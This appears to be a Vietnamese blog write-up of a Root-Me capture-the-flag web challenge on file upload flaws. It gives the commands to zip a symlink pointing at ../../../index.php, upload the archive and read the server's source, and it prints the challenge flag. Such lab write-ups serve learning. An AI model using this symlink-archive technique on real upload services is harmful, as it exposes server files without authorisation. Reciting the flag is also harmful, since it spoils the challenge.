Link: http://challenge01.root-me.org/web-serveur/ch51/
Chall này minh họa lỗ hổng File upload trên các ứng dụng web.Các bạn có thể google "File upload exploit" để tìm hiểu kĩ hơn. Quay lại giao diện nhắc chúng ta upload 1 file zip lên server. Thôi không dài dòng, chúng ta đi vào cách làm luôn nào :)
- Tạo 1 symlink đến ../../../index.php bằng câu lệnh:
- ln -s ../../../index.php lnlinh31
- Nén symlink vừa tạo:
- zip --symlinks test.zip lnlinh31
Sau khi nén xong, ta upload file .zip vừa tạo , sau đó truy cập đến path của file mà web tạo ra:
và đây là kết quả, chúng ta có thể đọc được file index.php và lấy flag!
Flag: N3v3r_7rU5T_u5Er_1npU7
0 nhận xét:
Đăng nhận xét